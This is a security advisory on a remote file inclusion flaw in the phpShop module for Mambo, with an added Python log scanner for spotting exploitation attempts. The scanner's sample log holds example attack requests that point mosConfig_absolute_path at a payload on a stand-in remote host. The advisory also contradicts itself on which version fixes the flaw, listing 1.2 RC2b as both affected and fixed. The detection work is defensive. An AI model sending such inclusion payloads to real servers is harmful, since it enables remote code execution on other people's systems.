phpShop component for Mambo toolbar.phpshop.html.php file include

phpshop-toolbarphpshop-file-include (28441) Risk level: Medium

Description:

phpShop component for Mambo (now known as VirtueMart) could allow a remote attacker to include arbitrary files. A remote attacker could send a specially-crafted URL request to the toolbar.phpshop.html.php script using the mosConfig_absolute_path parameter to specify a malicious file from a remote system, which could allow the attacker to execute arbitrary code on the vulnerable Web server.

Note: The following scripts are reported to be vulnerable:

  • mod_phpshop.php
  • mod_phpshop_allinone.php
  • mod_phpshop_cart.php
  • mod_phpshop_featureprod.php
  • mod_phpshop_latestprod.php
  • mod_product_categories.php
  • mod_productscroller.php
  • mosproductsnap.php
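As an added example that is not part of the X-Force record, the following Python scanner flags web-server log entries that request one of the scripts listed above with a mosConfig_absolute_path value pointing at a remote URL, which is the inclusion pattern this advisory describes. The log lines, client addresses and paths are constructed for the example; the Combined Log Format layout is assumed.

```python
"""Flag remote-file-inclusion attempts against mambo-phpShop scripts in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts named in the advisory (the toolbar script from the title plus the listed modules).
VULNERABLE_SCRIPTS = {
    "toolbar.phpshop.html.php", "mod_phpshop.php", "mod_phpshop_allinone.php",
    "mod_phpshop_cart.php", "mod_phpshop_featureprod.php", "mod_phpshop_latestprod.php",
    "mod_product_categories.php", "mod_productscroller.php", "mosproductsnap.php",
}
PARAM = "mosConfig_absolute_path"
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Combined Log Format (assumed): client - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_remote_include(value):
    """True when the value names a remote resource; decode twice to catch double-encoded payloads."""
    decoded = unquote(unquote(value)).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)

def inspect_request(target):
    """Return (script, value) if a listed script receives a remote URL in PARAM, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in VULNERABLE_SCRIPTS:
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() == PARAM.lower():           # liberal match; PHP names are case-sensitive
            for value in values:
                if is_remote_include(value):
                    return script, value
    return None

def scan_log(lines):
    """Return a list of (client, time, script, value) for every suspicious request in the log."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match and (found := inspect_request(match.group("target"))):
            hits.append((match.group("ip"), match.group("time")) + found)
    return hits

# Constructed sample log lines: two inclusion attempts, one local path, one request to an unlisted script.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Aug/2006:23:31:02 -0500] "GET /modules/mod_productscroller.php?mosConfig_absolute_path=http://198.51.100.7/x.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [17/Aug/2006:23:31:09 -0500] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 4088 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [17/Aug/2006:23:40:11 -0500] "GET /modules/mod_phpshop_cart.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 912 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [17/Aug/2006:23:41:30 -0500] "GET /index.php?option=com_phpshop&mosConfig_absolute_path=http://198.51.100.7/x.txt HTTP/1.1" 200 7710 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("RFI attempt: client=%s time=%s script=%s value=%s" % hit)
```

A client never legitimately supplies mosConfig_absolute_path, so any external occurrence of the parameter, including the local-path case above, is worth reviewing even though this rule only raises remote URLs.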

Platforms Affected:

  • Mamboserver, phpShop component for Mambo 1.2 RC2b and prior

Remedy:

Upgrade to the latest version of phpShop (1.2 RC2b or later), available from the phpShop Web site. See References.

Consequences:

Gain Access

References:

  • BugTraq Mailing List, Fri Aug 18 2006 - 17:51:50 CDT, Re: mambo-phphop Product Scroller Module R.F.I at http://archives.neohapsis.com/archives/bugtraq/2006-08/0436.html.
  • BugTraq Mailing List, Thu Aug 17 2006 - 23:29:06 CDT, mambo-phphop Product Scroller Module R.F.I at http://archives.neohapsis.com/archives/bugtraq/2006-08/0363.html.
  • VirtueMart Web site, VirtueMart (formerly mambo-phpShop) at http://www.mambo-phpshop.net.
  • BID-19591: Mambo Phpshop Product Scroller Component Multiple Remote File Include Vulnerabilities
  • BID-19879: VirtueMart MosConfig_Absolute_Path Parameter Remote File Include Vulnerability
  • CVE-2006-4263: Multiple PHP remote file inclusion vulnerabilities in the Product Scroller Module and other modules in mambo-phpshop (com_phpshop) for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) mod_phpshop.php, (2) mod_phpshop_allinone.php, (3) mod_phpshop_cart.php, (4) mod_phpshop_featureprod.php, (5) mod_phpshop_latestprod.php, (6) mod_product_categories.php, (7) mod_productscroller.php, and (8) mosproductsnap.php.
  • OSVDB ID: 28151: mambo-phpShop mod_phpshop.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28152: mambo-phpShop mod_phpshop_allinone.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28153: mambo-phpShop mod_phpshop_cart.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28154: mambo-phpShop mod_phpshop_featureprod.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28155: mambo-phpShop mod_phpshop_latestprod.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28156: mambo-phpShop mod_product_categories.php mosConfig_absolute_path Variable Remote File Inclusion
  • OSVDB ID: 28158: mambo-phpShop mosproductsnap.php mosConfig_absolute_path Variable Remote File Inclusion

Reported:

Aug 17, 2006

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net